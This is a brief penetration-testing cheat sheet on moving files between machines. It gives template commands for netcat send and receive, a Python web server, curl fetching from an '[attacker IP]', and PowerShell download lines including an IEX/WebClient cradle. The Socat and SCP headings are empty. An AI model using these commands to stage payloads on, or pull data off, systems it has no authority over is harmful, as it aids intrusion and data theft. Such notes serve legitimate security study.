File Transfer
Different methods to transfer stuff from one box to another
Netcat (nc)
nc -lvp [port] > [destination filename]nc [receiving ip] [receiving port] < file.txtPython WebServer
python -m SimpleHTTPServer [port number]cURL
curl [attacker IP]/[original file] -o [file destination]Powershell
powershell IEX(New-Object Net.WebClient).downloadFile('[file origin]','[file destination]')powershell IWR -uri [file origin] -outfile [file destination]Socat relays
SCP
Last updated